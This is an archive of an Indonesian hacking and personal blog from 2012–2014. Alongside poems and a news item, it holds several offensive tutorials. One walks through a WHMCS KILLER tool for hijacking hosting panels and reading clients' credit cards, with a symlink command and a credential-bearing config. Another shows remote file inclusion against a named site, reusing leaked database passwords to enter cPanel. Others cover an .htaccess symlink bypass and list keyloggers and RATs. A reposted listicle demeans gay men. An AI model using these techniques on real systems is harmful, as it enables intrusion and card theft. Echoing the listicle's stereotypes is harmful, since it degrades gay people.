id-ame.blogspot.com

Selasa, 11 Maret 2014

JANGAN NGAKU HACKER KALAU BELUM BACA INI

Renungin jati diri lo


Maaf bro artikel ini ane copy dari tetangga sebelah, ane cuma bantu share ajeh ! gak ada maksud apa2.


( Original Posting From: Binus Hacker )

Setiap hari exploit demi exploit terus di publikasi di situs² underground para hacker.

Setiap hari selalu aja gw liat satu persatu situs mulai berjatuhan dan halaman index mereka telah berubah secara frontal dengan background rata² berwarna hitam dengan tulisan “Hacked by”.

Mereka yg mulai kenal dengan istilah Hacker mulai mencari berpuluh puluh tutorial di internet tentang cara mendeface situs, mencoba bertanya di milis, forum, hingga bertanya langsung pada sang defacer via chating, dan mereka hanya mendapatkan jawaban “saya bukan hacker kaka”, “Hacker apaan sey omz”, “saya cupu om, ga bisa apa², salah orang situ klo nanya sama saya” yapz… sebuah statement merendahkan diri menaikan mutu dari seorang defacer kacangan yg mengaku hacker.

10 tahun lebih gw terjun di dunia perhackingan, dan melihat scene hacking khususnya di indonesia, apa yg gw liat tentang hacking situs selama ini di lakukan bukan oleh seorang hacker, bahkan seorang cracker, mereka hanya seorang script kiddies yg hanya menyombongkan diri dari hasil deface mereka, dan mereka berbangga dalam hati mereka dan menyebut diri mereka “I am Hacker”....

Kenapa mereka gw sebut rata² script kiddies, bukan… bukan gw meng-claim semua defacer itu seorang script kiddies, ada beberapa dari mereka yg mempunyai skill yg ga main², tapi rata² para cracker baru yg gw liat selama ini hanyalah seorang yg mengaku hacker tapi buta akan programming, ga bisa membuat program, ga ngerti gimana cara mencari exploit itu sendiri, mereka hanya singgah di situs hacker, melihat news bug terbaru, mencari korban melalui search engine, menginjeksi exploit pada url korban, mendapatkan password sang admin web yg masih terenkripsi, lalu meng’cracking password itu pada sebuah situs password cracking tanpa tau cara kerja’a, setelah password asli telah di dekripsi, mereka masuk ke dalam situs korban yg di tuju serta melakukan pengrusakan besar²an dan menyebut diri mereka dengan bangga dalam hati “I am Hacker”.

Perlu lo ketahui, 1000 website yg lo deface dalam satu hari ga akan menjadikan lo seorang hacker, sebuah statement bodoh klo ada seseorang mengklaim diri mereka seorang hacker tapi buta akan programming dan ga bisa membuat program sendiri, sebuah statement bodoh apabila ada seseorang mengklaim diri mereka hacker dan mendeface sebuah situs melalui shell inject tapi mereka ga bisa lepas dari windows dan ga pernah mau apabila di suruh menginstall linux pada hardisk mereka dengan alasan linux/unix itu susah !! what d fuck !! and you claiming yourself a hacker ??

Friend… open your eyes, you’re not a hacker, you just script dumb kiddies, take a look around, seorang hacker tingkat tinggi melakukan deface untuk memberi tahu sang admin bahwa ada kelemahan pada situsnya dan mereka berani bertanggung jawab atas perbuatannya.

seorang cracker berbahaya mendeface sebuah situs karena mereka mencari keuntungan materi dari itu semua, dan seorang script kiddies mendeface sebuah situs hanya untuk pamer dan menjadi terkenal tanpa berani bertanggung jawab pada perbuatan mereka.

Cukup buat lo tau aja, seorang hacker dan cracker mampu membuat dan memodifikasi sebuah program, lain hal dengan script kiddies, gada yg bisa di banggain dari mereka, mereka hanya merusak dan merusak tanpa tau gimana cara memperbaiki apa yg mereka rusak, jadi masuk ke dalam kategori yg manakah lo??


Ga adakah rasa malu lo ketika lo bisa membuat sebuah situs hancur dalam sekejap tapi lo ga ngerti ketika seorang bertanya apa itu TCP/IP, bagaimana mengkonfigurasi Firewall, bagiamana cara melihat port yg terbuka, apa perbedaan methode post dan get... See More

Ga adakah rasa malu lo ketika lo mampu membuat situs itu jadi bermasalah dalam waktu yg lama tapi lo ga ngerti cara memfilter syntax SQL yg memungkinkan seorang attacker masuk melalui sql injection, cara patching situs yg terkena masalah remote file inclusion

Ga adakah rasa malu lo ketika lo di sebut hacker oleh orang lain tapi ketika lo di test untuk kerja oleh sebuah perusahaan dan di suruh membuat program dari bahasa pemrograman yg lo kuasai ternyata gada satupun bahasa program yg lo kuasain, dan lo menyebut diri lo hacker? lo salah besar kawan, lo cuma nol besar.

Untuk menjadi seorang defacer sangatlah mudah, ga perlu banyak pengetahuan lebih, tapi untuk menjadi the real hacker bukanlah sebuah hal yg gampang, ketekunan, rasa ingin tau yg sangat besar, membuat, menghadapi dan menyelesaikan masalah bakal membuat lo menjadi seorang hacker yg cukup handal untuk menghadapi hari esok.

so... See More… jadikanlah hidup lo ini lebih berharga, mulai dari sekarang yakinin di hati lo bahwa jangan ada lagi kata main², jangan pernah lagi ngelakuin hal² yg ga jelas dan sia² tanpa ada suatu alasan yg jelas, jangan tunggu besok lagi untuk berubah, karena hari esok belom tentu berpihak buat kita.
dan walaupun gw sering melakukan deface terhadap situs² dan mampu membuat program sederhana, tapi gw masih blom pantes untuk menyandang gelar seorang Hacker, masih ada orang yg lebih pantes untuk menyandang gelar itu, dan hingga saat ini gw masih tetap berjuang untuk terus belajar, belajar untuk menemukan sebuah titik cerah dalam hidup, karena gw mengerti bahwa 1 detik dalam hidup sangat berharga dan ga akan pernah bisa terulang lagi.#eof



SEMOGA BERMANFAAT RENUNGAN INI

Beberapa Tipe COWOK yang Di sukai MAHO (GAY)





Beberapa Tipe Cowok Yang di sukai MAHO Gay dan terong-terongan

haduh lama ga update di blog ini , maklum gan sibuk nyari susu :D
Ga sengaja jalan2 ke blog temen gue eh nemu artikel kek gini , CUCOK deh buat di share lagi :D 


1. Lelaki berwajah feminim lebih disenangi
Karena rupa pria tersebut dinilai punya karakter yang tak kasar. Disamping itu pria berwajah ‘perempuan’ sengaja jadi pilihan, sebab secara psikis bisa diposisikan sebagai wanita saat berduaan.

2. Lelaki kere (miskin)
Mengapa keberadaan materi jadi ukuran? Kerap kondisi miskin itulah yang jadi peluang bagi pria homo untuk menguasai pria idamannya (materi dan seksual).

3. Lelaki dengan gaya berjalan agak membungkuk
Di kalangan wanita ada mitos tentang pria yang cara berjalannya agak membungkuk. Pria tersebut mampu memuaskan kebutuhan seks pasangannya. Mitos ini juga lumayan tersanjung dikalangan homoseksual.

4. Lelaki lugu (bukan bego)
Lelaki berkarakter lugu jadi incaran, karena bisa dikendalikan semaunya. Baik itu saat beraktivitas seks, maupun dalam pola hidup keseharian.


5. Lelaki dengan dandanan yang aneh
iyalahh, kalau agan sendiri berpakaian atau berpenampilan aneh dan mirip mereka gimana agan ga jadi incaran?? jd normal2 aja ya gan klau mau bergaya, hhe


6. Cowok berhidung atau berjari besar
Ini sangat terkait dengan mitos tentang ukuran alat vital. Dimana pria dengan hidung besar bak jambu air atau memiliki jari besar dengan ukuran kuku jempol tangan besar seolah identik dengan alat kelamin yang besar pula. Beberapa orang yang berkelamin besar memang memiliki hidung besar atau kuku jempol yang besar pula. Kalangan gay menyukai ukuran alat vital yang besar karena identik dengan nilai kepuasan saat berhubungan seks.


7.Pria dewasa atau kebapakan
Om-om atau bakap-bapak nyaris diburu oleh kalangan gay atau LSL muda. Tidak peduli apakah pria dewasa atau bapak-bapak tersebut sudah memiliki istri dan anak, terkadang pria gay remaja begitu menggilai sosok kedewasaan yang identik dengan kemapanan secara mental dan ekonomi, serta sosok pengayom dan bisa mengemong atau membimbing. Namun tak jarang pria gay dewasa juga banyak yang lebih menyukai pria dewasa lainnya, karena merasa lebih save dan tidak neko-neko, seperti cowok remaja. Ada juga yang menjadikan pria dewasa hetero sebagai obyek untuk dipuaskan. Banyak pria gay rela menjadi budak nafsu pria dewasa dan rela menservice pria dewasa ini tanpa imbalan apapun. Bahkan meski tidak dijamah sekalipun oleh pria dewasa ini, karena mereka cuma diam saja bagaikan gedebog pisang, tanpa menyentuh pria gay yang sedang menservicenya.


8.Pria muscle atau macho

Tubuh tegap berisi bagaikan atlet binaraga dengan dada sixpack menjadi dambaan dan idaman banyak pria gay. Beberapa situs pertemanan sosial khusus gay, banyak yang berlomba-lomba memajang tubuh atletis dengan dada sixpack untuk menarik gay lain. Namun pria hetero dengan tubuh tegap dan muscle sering jadi obyek seks pria gay. Umumnya dari kalangan TNI atau militer, kepolisian hingga satpam. Ada kebanggaan tersendiri ketika pria gay memiliki pasangan atau BF seorang militer atau kepolisian hingga satpam yang hetero. Bahkan mereka rela melakukan apa saja termasuk mengiming-imingi pemberian materi hanya untuk mendapatkan perhatian dan respon dari kalangan militer atau kepolisian ini. Tak jarang banyak pria gay dengan ekonomi mapan menjadi korban pemerasan hingga pelecehan dari oknum kalangan militer atau kepolisian.

ingat gan maho itu dosa besar, dan ancaman semakin merajalela.


    

Narasumber : http://www.pandaan.net/2012/07/inilah-ipe-cowok-yang-disukai-maho.html

Jumat, 27 Desember 2013

AIR MATA IBU


AIR MATA IBU



Dalam Senyum mu kau sembunyikan letih mu
Derita siang dan malam menimpa mu 

tak sedetik pun menghentikan langkah mu

Untuk bisa Memberi harapan baru bagi ku


Seonggok Cacian selalu menghampiri mu

secerah hinaan tak perduli bagi mu

selalu kau teruskan langkah untuk masa depan ku

mencari harapan baru lagi bagi anak mu


Bukan setumpuk Emas yg kau harapkan dalam kesuksesan ku

bukan gulungan uang yg kau minta dalam keberhasilan ku

bukan juga sebatang perunggu dalam kemenangan ku

tapi keinginan hati mu membahagiakan aku


Dan yang selalu kau berkata pada ku

Aku menyayangi mu sekarang dan waktu aku tak lagi bersama mu 

aku menyayangi mu anak ku dengan ketulusan hati ku .

Rabu, 09 Oktober 2013

20 Defacer yang Mengharumkan Nama Indonesia

udah lama ga posting euy :D 
ini adalah 20 defacer yg mengharumkan nama indonesia , yu kita tengok siapa saja sih mereka .

Pasti udah pada tau dong DEFACE itu apa ?

Ya benar sekali salah satu Seni hacking yang merubah index suatu website , 
Udah tau ? Bahwa defacer Indonesian yang active (Bisa di Bilang Mengesankan) 
Ini saya kutib dari beberapa sumber .MagelangCyber . Indonesian Defacer . Archive Santri Cyber. & Zone-h 

ya benar sekali . banyak yang bilang Seni hacking Ini banyak di Lakukan (Para Lamer) tidak semua defacer Begitu . Berikut Daftar 20 Defacer Indonesia


Quote:
~# kaMtiEz
Kutipan : Kamitiez Ini adalah salah satu orang lama dalam Bidang Deface Mendeface Ini , Dia Pun di kenal Dengan Crewnya (Magelang Cyber) & Indonesian Coder . Defacer satu ini wajib di acungi Jempol 
Quote:
~# Jundab
yap benar Ini adalah teman dari Kamitiez itu sendiri , yang banyak yang bilang bahwa defacer satu Ini (Berbau Jihad) (Terlihat pada Html Defaced Nya Sendiri) dia pun di kenal dengan Mass Junz Magelang Cyber 
Quote:
~# Hmei7
Hmei7 , Mempunyai Skill Vb6 yang memadai & yang sering menyatroni Forum Underground Ini berasal Dari semarang , Dia Pun Bisa di Kenal Teman Mas Junz & Kamitiez, Jangan anggap enteng defacer satu ini 
Quote:
~# Kal0ng666
Kal0ng666 (Dari Nick saja) Kalian sudah bisa Menebak Salah satu attacker Situs Pemerintah & Forum Underground ini . Dari Pekalongan (Pekalongan Blackhat) . tentu saja dengan team / teman , seperti hmei7 , kamitiez & Jundab dia cepat di Kenal Masyarakat Dunia maya ! 
Quote:
~# Dr.Cruzz
Dr.Cruzz yang , Staff Indonesiancoder.com Ini sendiri , terlihat dari sifat misterius Nya sendiri . dari dia mendeface forum Hacking Regional ternama (PalembangHackerLInk) Nama dia Terkenal Sejak Aksi Defacenya , di PHL Defacer satu ini Wajib Kita acungi ,
Quote:
~# Al3x_0wn5
Defacer satu ini juga pernah melakukan pada situs regional lainya . terdengar dia anak Medan (Yang menentang Forum Regional Sendiri) yap medan Cyber , Tapi dengan skill. yang memadahi Alex Pantas Kita AnggapSebagai Warga 
Quote:
~# Ho1onk
Kebalikan Alex , si Ho1onk Ini adalah orang penting di (Hacker-Newbie.org) dia Menajabat sebagai Mod (Admin di MedanCYberTeam) << yang di Benci Alex , dan Juga , keahlian di Bidang MIRC memaksa kita angkat kaki dah , Archive yang rata rata webshop membuat pada carder marah ,  dia Pantas di Sebut Menjilat Lidah Sendiri 
Quote:
~# Marwanz
Marwanz , di sini saya Melihat dia Baru Masuk (20 Besar Di IndevEs) . tapi website yang dia archivekan sendiri harus membuat saya mengakui bahwa dia memang ,  , dan Kami Banyak Melihat (user satu ini) Memiliki Banyak masalah kepada defacer Besar (enteh kenapa) . 
Quote:
~# s13doeL
Nothing , defacer satu ini saya ga berani comment, Duah , Menurut saya skillnya Rata rata & Pemakai Tools Hmei7  . Team Elite dari defacerz.com  . ga Memungkinkan , !
Quote:
~# Boebefa
Team Elite Defacerz.com ini , saya belum tau pasti , aluran defacedNya Juga rata rata website China , (Site pemerintahan Cinta) Gov.cn , dan saya salut orang pada war ma malay dia ma china 
Quote:
~# a5tr0
Defacerz satu ini , Hanya Mengandalkan tools & Target sampah dari sesama teman , Just a Lamer To Astr0  , HN TEAM (Predikat yang dia pakai)
Quote:
~# Mhiman
Pendeface Team elite HN Community ini , yang di akui ,Astr0 (Mastah Mhiman Katanya) , sama sekali ga pantes Masuk 20 Besar IndeVeS , tapi rajin yak , Top deh 
Quote:
~# BaghazzNewbie23
BaghazzNewbie23 , ya Defacer satu ini sudah terkenal di google ,apa lagi dengan wordpress , wordpress yang dia deface . dia pantas Mendapatkan Profesional Security Wordpress , 
Quote:
~# JuFrY_GapTeK
Sampah Nothing Special, !
Quote:
~# Conficker
Defacer yang udah lama ini , saya akui memang mantap , apa lagi di dalam Bidang MIRC dia sangat jago 
Quote:
~# Motaroirhaby
Motaro , ini di kenal dengan Team elite CyberJihad , yang mengataskan nama allah di setiap defacean Nya , (Top Record pernah menghajar Site pertamina)
Quote:
~# Ibllezboy
Ahli dalam web design & Blogger, Top utk defacean Nya juga yang membawa nama indonesia , Top Top 
Quote:
~# sr1_0d0nk
Defacer yang gak aktif , ga tau kemana kabarnya !
Quote:
~# Dicka
Defacer Yang gak aktif ga tau kemana Kabarnya !
Quote:
~# OnestreeDefacer ,
 yang mempunyai banyak teman ini , adalah Pemimpin dari IslamCYber , yang sampai kini onestree terus mengahajar situs Malay , (Pantas di Peringkat 18 tapi , archive yang membuat dia kalah)
Mungkin segitu Dulu yang dapat kami Kutip dari , Defacer Indonesia , 
Ada yang ,Mengharumkan nama Indonesia & Menghancurkan nama Indonesia , !

Write By : Indonesian Defacer Team
Sumber : Kaskus

Minggu, 27 Januari 2013

Remaja Peretas Situs Presiden SBY Ditangkap Tim Mabes POLRI


Wildan Yani Ashari, Seorang remaja di Jember, Jawa Timur diamankan Tim Mabes POLRI karena diduga terlibat tindak pidana kejahatan teknologi.
Ia diduga kuat sebagai pelaku peretas pembobol situs resmi Presiden Susilo Bambang Yudhoyono yang terjadi beberapa waktu lalu. Wildan berkerja sebagai teknisi komputer di Jalan Letjen Suprapto, Jember, Jawa Timur.

Video Selengkapnya Bisa Anda Saksikan Remaja Peretas Situs Presiden SBY Ditangkap Tim Mabes POLRI Di Sini

Senin, 05 November 2012

WHMCS KILLER V2.php

Udah ada yang pernah denger whmcs? atau whmpanel?
nah di tutorial kali ini, gw mo share cara menggunakan tools WHMCS KILLER
.
apa gunanya?
1. kita bisa login as admin dalam sebuah hosting dan bisa melakukan apa saja sesuka kita, contoh web target ada disana, nah kita tinggal edit cpanel lewat whmcs yang udah kita, bacaaa "HECK" =))
2. kita bisa dapat root cuma"
3. kita bisa dapet cpanel semau kita
4. crack VPS/SERVER
5. Carding / Read clients credit card
6. dll.
.
nah pertama lu kudu punya target whmcs yg ada 1 server dengan shell kalian.
nah biasanya di web tsb, ada tempat login client/admin
biasanya nama tmpat loginnya
/clientarea, /manage, /client /developer /billing /billingclient /bill

kita kudu dapetin config whmcs tsb dengan cara apapun, contoh dengan:
1. Symlink : praktekan command ini "

ln -s/home/user/public_html/folderclient/configuration.php
2. Root server: dengan menggunakan exploit yg bisa anda temukan di google =)) lalu baca file config whmcs
3. Jumping : tapi kayanya kemungkinan 10% cz dir yg mo di read dari group laen chmodnya beda"

.
Nah klo kita udah dapet file config, ini contoh salah satu file cofig whmcs:
------------------------------------------------------------------------------------
<?php
if(isset($_GET['licensedebug']))
{
unset($_GET['licensedebug']);
exit('Access Denied');
}
if(isset($_GET['forceremote']))
{
unset($_GET['forceremote']);
exit('Access Denied');
}
if(isset($_GET['revokelocal']))
{
unset($_GET['revokelocal']);
exit('Access Denied');
}
$license = 'Leased-d8fbbd343a2408bf7d09';
$db_host = 'localhost';
$db_username = '*****************';
$db_password = 'xS%564Ukea}|';
$db_name = '************';
$cc_encryption_hash = 'MM3hLAb9wDEUovvbwy9SSC0ElML4HfOkSHst7utuXYebjAdGYdoGFfbQRMKpSozA';
$templates_compiledir = '/home/myaccoun/whmcs_secured_folders/templates_c/';
$attachments_dir = '/home/myaccoun/whmcs_secured_folders/attachments/';
$downloads_dir = '/home/myaccoun/whmcs_secured_folders/downloads/';
$customadminpath = '__admx';
?>

-----------------------------------------------------------------------

nah klo udah dapet kaya begituan, kita masukin ke WHMCS KILLER.
oh ya password whmcs killernya
username: root
pass: toor

.
isikan identitas target dengan sempurna lalu klik submit....
dari situ ada menu" yg mudah dimengerti, mulai dari edit pass admin/client sampe read password cPANEL :D
DOWNLOAD HERE

Berbagi itu indah kawan....

a.M.e


Minggu, 09 September 2012

sahabat hacker



udah lama ga posting nih gan ,,
nah ini ada sebagian dari sahabat para "Hacker"
Langsung ajah nih di baca artikel-a :D
semoga bermanfaat kawan.

Google, sahabat para hacker.

Nah, kalian semua pasti kenal sama Google, situs satu ini bagaikan anak panah yang akan mengenai sasaran dengan tepat, dengan Googling, kita bisa mendapat ilmu yang sangat berguna, Google juga bisa untuk melakukan beberapa teknik hacking. Teknik tersebut bisa dipelajari di subforum google hacking.

http://www.google.com

Wikipedia, sumber ilmu
Wikipedia bukanlah kamus, tapi ensiklopedi, teman2 bisa mengetahui hal-hal yang belum tahu definisinya, misalkan kalian tidak tahu apa itu SQL Injection, teman2 bisa pakai wikipedia.

http://www.wikipedia.org

Spamlaw, Kamus kita
Spamlaw jugas berguna untuk mencari arti2 kata yg berhubungan dengan IT.
Teman2 bisa mudah untuk mengetahui sesuatu dari sini.

http://glossary.spamlaws.com


Forum, tempat share kita
Kalau sudah dapat ilmu atau apa, mari bahas bareng2 di forum, Forum bisa membuat kita lebih mengerti atau memperjelas sesuatu, bisa tanya langsung ama master jika belum tahu.

http://forum.xcode.or.id

Video, boleh juga
Kalau yang satu ini adalah tutorial hidup, maksudnya, tutorial yang praktek langsung, bisa lebih tahu atau lebih jelas.. biasanya yang suka share video tuh si abah.

http://www.youtube.com

Cmd dan Batch
Apakah kalian tahu, command prompt adalah alat hack yang sangat amat ampuh?? Kalian bisa pelajari yang satu ini,
Bagus banget lho, Kamu bisa bkin virus, dll.

Cain and Abel..
Tools ini wajib dimiliki, pokoknya banyak gunanya,

www.oxid.it/cain.html

KeyloggerNah, kalo yang satu ini pasti semua sudah tahu, iya keylogger berguna untuk merekam apa yang diketik seseorang, bisa untuk mencuri password, dsb..

Remote Acccess Tools
RAT biasa disebut sebagai trojan, tools ini berfungsi untuk mengendalikan komputer orang lain dari jarak jauh. Jika kita menggunakan RAT, ada dua program yang kita butuhkan yakni server dan client.
Server adalah program yang kita jalankan di komputer orang untuk mengendalikannya melalui client.
Banyak yang dapat kita gunakan sebagai RAT seperti ProRat, Beast, dll.

OphCrack
Yang satu ini bisa untuk mengcrack password user di windows, tidak wajib, tapi lebih baik punya... tools ini harus diburn di cd, atau diboot menggunakan disket atau Flashdisk.

Itulah yang bisa saya sampaikan, tapi ingat!!

"Tools tidak membuat seseorang menjadi hacker, tapi hackerlah yang membuat tools."


bagaiamana?
semangat terus saudaraku .... gapailah citamu ;)
ingat hacker adalah seni, kreatiflah dan kembangkan seni.mu hahaha :D


Salam a.M.e

Senin, 03 September 2012

Trik Bobol Cpanel

Mungkin Buat Master-Master Cara Seperti Ini sudah basi , tapi tak ada salahknya jika di kembangkan lagi :D haha cekidooott !!!!

Apakah Cpanel itu? 
Cpanel adalah merupakan pusat dari manajemen web site, CPanel atau istilah kerennya Control Panel adalah tempat dimana admin web untuk melakukan setting penuh dan control terhadap web yang akan dibuat atau istilahnya adalah CPANEL = Rumah yang masih kosong yang belum ada apa-apanya, nah disanalah nanti akan diisi perabotan-perabotan untuk melengkapi isi rumah tersebut, Cpanel sama juga seperti rumah, dan perabotannya bisa dikategorikan sebagai script web, script mail, script MySql, dll. Apakah CPANEL itu begitu penting dan berharga ? yups pertanyaan yang bagus jawabannya adalah IYA, karena bila CPANEL dalam suatu Web bisa dimasuki oleh para hacker maka dapat dipastikan bahwa web target berada dalam control sang hacker [ maaf saya bukan hacker ] atau bila dilogikakan sama saja bila rumah kita berhasil di kuasain orang lain maka dipastikan orang lain tersebut bisa masuk kapan saja terhadap rumah kita. tapi apakah mudah rumah kita orang lain bisa masuk kerumah kita sedangkan rumah kita ada pengaman yaitu KUNCI, yups sama saja dengan CPANEL tidak semudah yang kita bayangkan karena untuk masuk ke area CPANEL membutuhkan kunci yaitu Username dan password, bila tidak maka anda dipastikan tidak akan bisa masuk ke dalam area CPANEL tersebut. Cukup jelas logika kita untuk berpikir , so sekarang kembali lagi ke pokok permasalahannya, penulis akan menerangkan pengambilan alih cpanel terhadap web target memakai kesalahan dari script logika pemograman dan kesalahan dari admin web tersebut, ,

Ok saya Coba ambil suatu bug dari script PHP dengean merek ‘subdreamer’ [ bisa diliat di www.subdreamer.com ] ..
bug yang ada adalah : /skins/advanced/advanced2.php?pluginpath[0]= dengan file yang bermasalah adalah advanced2.php, kita akan coba cari target dengan memakai paman google.com dengan syntax : inurl:’ skins/advanced/advanced1.php?’, penulis ambil contoh situs luar negeri [ sebelumnya sudah member tahukan bug ke mail mereka sesuai dengan etika hacker ]  yaitu : http://www.cafesjakie.nl ..

Kita coba lakukan penetrasi terhadap situs target, dengan memakai phpshell maka akan didapat hasil :
http://www.cafesjakie.nl/skins/advanced/advanced2.php?pluginpath[0]= 
Maka akan Nampak hasil seperti dibawah ini :




Ok’s kita berhasil masuk lewat belakang [ backdoor ] tetapi kita belum mendapat akses utama [ cpanel ] hanya bisa masuk lewat pintu belakang, so kita coba cari dimana letak akses utama [ cpanel ], perhatikan satu persatu file yang ada, kita bisa liat di atas file phpshell kita



Bahwa target berada di posisi safe-mode : OFF, dan disana kita bisa liat uid:65534(nobody), gid=65534(nobody), groups=65534(nobody) dengan user : gbremmer, good awal yang bagus untuk kita coba cari akses cpanel pada web target tersebut [bila belum mengerti akan uid,gid,groups bisa mempelajari OS berbasis open Source seperti LInUX, I love linux ], lanjut perhatikan di atas disana ada file /home/gremmer/public_html/skins/advanced, kita akan coba mendapatkan akses cpanel coba masuk ke halaman utama web target tersebut , klik folder public_html atau bila anda seorang admin web ,folder public_html = www , maka akan didapat hasil di bawah ini :



Perhatikan dengan seksama folder-folder tersebut, kita akan berpikir secara logika bahwa untuk menghubungkan database memerlukan suatu username dan password, biasanya letak keduanya berada dalam file config.php, configuration.php, koneksi.php [ tergantung dari pembuat script tersebut ], penulis coba kita akan klik folder includes [ biasanya secara default letak config.php di script subdreamer ada di dalam folder includes], maka akan didapat hasil :



Perhatikan disana ada 2 file yaitu config.php dan config.php.new, btw kita bisa liat ke-2 nya, hanya ada perbedaannya yaitu masalah byte –nya [ kemungkinan config.php.new hanya untuk update saja ], klik config.php maka akan didapat hasil :



perhatikan lagi didalam file config.php kita bisa melihat databse user lengkap dengan passwornya , Cuma disini kita tidak akan masuk ke dalam database tersebut karena kita akan mencoba mendapatkan akses utama yaitu cpanel web target, perhatikan dengan seksama di $dbname = gbremmer_subdreamer

$dbusername = gbremmer_subdrea, so secara logika gbremmer adalah nama dari user tersebut dan dibelakangnya adalah default nama dari hosting tersebut, dan perhatikan sekali lagi file $dbpassword = hiervomgb, merupakan dari password user tersebut untuk masuk kedalam database web target, stop, pertanyaannya apakah kita bisa masuk ke cpanel target tersebut ? pertanyaan yang bagus, disini penulis akan mengajak anda berpikir secara logika, pernahkah anda merasa aman untuk melakukan aktivitas di dunia maya [ internet ]? Untuk orang awam mungkin ini adalah pertanyaan yang bodoh, mungkin orang akan berpikir akan aman dan nyaman untuk urusan dunia internet [ hampir 80 % yang mengatakan demikian, sehingga untuk urusan password hanya satu password untuk banyak keperluan ] J, karena kita berpikiran begitu maka disinilah letak kesalahan dari kita sendiri [ tidak pernah mau tahu untuk urusan keamanan dalam internet ], so kembali ke akar permasalahannya, kita akan berpikir terbalik dari kebanyakan orang awam , kita akan coba memakai user name : gbremmer dan password : hiervomgb untuk mendapatkan akses utama dari cpanel target tersebut.

Mari kita buka URL : http://www.cafesjakie.nl/cpanel, liat halaman cpanel terproteksi oleh user name dan password ,




Bingung kan ? kita akan coba memasukkan username dan password yang kita dapat dari file config.php



 liatlah kita dapat memasuki cpanel target tersebut, dapat secara full melakukan control terhadapa admin tersebut hanya dengan bermodalkan logika tanpa harus susah payah  karena memakai kesalahan dari logika script pemograman dan dari admin tersebut .




Note :
- Belajar menjadi hacker adalah sesuatu yang menyenangkan yang susah adalah etika –nya- – Bila berhasil memasuki web target usahakan untuk memberi tahukan ke pihak yang terkait agar dapat dilakukan patch terhadap web tersebut [ sekalian minta donasi via e-gold ] haha
- Jadikan hacking is art jangan merusak [ kecuali kalo kepepet ] just kidding bray
- Tanamkan ke diri kita sendiri bahwa untuk urusan dunia maya ga menjamin pure 100% aman,   [ Nothing Secure in The world or Di dunia ini tidak ada yang aman or di atas langit masih ada langit ]
- Jadikan pembelajaran untuk admin web bila kena webnya kena Deface ga usah lapor ke pihak berwenang [ ntar malah ngeluarin duit banyak ]
- Untuk admin selalu lakukan update patch secara otomatis atau manual, serta lakukan backup data web secara teratur ] seharusnya kita berterima kasih bahwa web kita diingatkan oleh para hacker tersebut, [ bukannya marah – marah dan ngomong di TV –TV ] bahwa web yang harganya diatas 200 juta bisa dikatakan aman.


-==Semoga Bermanfaat Bray==-
Happy hacking
Titip nama kalo Berhasil
a.M.e <

Selasa, 17 Juli 2012

kau selalu buat ku bertanya-tanya tentang perasaan ini

kau selalu buat ku bertanya-tanya tentang perasaan ini

Dulu…
kau yang ku kenal
begitu dekat ku rasa
kau begitu akrab di mata ku

tapi…….itu semua telah sirna Kamu mungkin belum terlalu paham dengan perasaanku, karena kamu memang tak pernah sibuk memikirkanku. Berdosakah jika aku seringkali menjatuhkan air mata untukmu? Aku selalu kehilangan kamu, dan kamu juga selalu pergi tanpa meminta izin. Meminta izin? Memangnya aku siapa? Kekasihmu? Bodoh! Tolol! Hadir dalam mimpimu pun aku sudah bersyukur, apalagi bisa jadi milikmu seutuhnya. Mungkinkah? Bisakah?
    Memilih ? Atau Karena Keraguan ?
17 Hari dan selama itu aku tak pernah dapat ucapan sayang,maaf,kangeeeen, peluk , kiss me please .
Dalam Hatiku , aku selalu bertanya-tanya , kemana semua itu ? adakah orang lain yg saat ini bisa membuat kamu tersenyum bahagia ? 
Dan Dalam sepiku , dalam kesendirian , dalam kesenanganku , Aku tak pernah sedikitpun melupakan kamu , aku selalu memikirkan kamu. teringan Kembali ketika Aku bertanya padamu... :



  • A : Apa kamu serius ?
  • T : Iya aku serius ko !!
  • A : kamu yakin sama perasaan kamu ?
  • T : Iya , yakin banget.. Aku sayang kamu , jangan pernah tinggalin aku ya , kamu harus jagain aku. aku g mau kehilangan kamu. Tunggu aku sampai aku lulus kuliah(wisuda) aku mau nikah sama kamu.
Tapi sekarang , itu semua telah sirna karena ulahku :'(
tanpa aku tahu dimana letak kesalahan aku sendiri.
Mencoba dan terus berusaha agar bisa menjadi yang terbaik buat kamu , kebaikan , ketulusan aku kini jadi boomerang buat aku.

Janjimu terlalu banyak, hingga aku lupa menghitung mana saja yang belum kamu tepati. Begitu sering kamu menyakiti, tapi kumaafkan lagi berkali-kali. Lihatlah aku yang hanya bisa terdiam dan membisu. Pandanglah aku yang mencintaimu dengan tulus namun kau hempaskan dengan begitu bulus. Seberapa tidak pentingkah aku? Apakah aku hanyalah persimpangan jalan yang selalu kau abaikanjuga kau tinggalkan?

Jelaskan Padaku apa salah aku ? Apa kini sudah tak ada kesempatan buat aku perbaiki semuanya ?

Mungkin... semua memang salahku. Yang menganggap semuanya berubah sesuai keinginanku. Yang bermimpi bisa menjadikanmu lebih dari teman. Salahkah jika perasaanku bertumbuh melebihi batas kewajaran? Aku mencintaimu tidak hanya sebagi teman, tapi juga sebagai seseorang yang bergitu bernilai dalam hidupku.

selalu berharap dalam ketidak pastian
kau selalu buat ku bertanya-tanya tentang perasaan ini,
ku abaikan semua rasa ini,
walau kau katakan bahwa apa yang ku rasa sama kau rasakan,
namun itu semua hanya ucapan manis mu,
kau tak pernah hiraukan aku,
kau selalu gantungkan perasaan ini,
hingga ku terkadang capek dengan semua ini,

Senin, 16 Juli 2012

ByPass Symlink 403 Forbidden with .htaccess

Tutor ByPass Symlink 



Oke langsung saja gan.. 
Langsung aja buat file .htaccess (tepat dimana direktori symlink berada) trus isikan fungsi fungsi nya sbg berikut: 

Options all 
DirectoryIndex Sux.html 
AddType text/plain .php 
AddHandler server-parsed .php 
AddType text/plain .html 
AddHandler txt .html 
Require None 
Satisfy Any 
Options Indexes FollowSymLinks

kemuadian save dengan format .httacces .


semoga bermanfaat

visitor


SEO Stats powered by MyPagerank.NetCheckpagerank.net
Twitter Delicious Facebook Digg Stumbleupon Favorites More

 
Design by aMe | bogor hackers community Lasantha - :D | thanks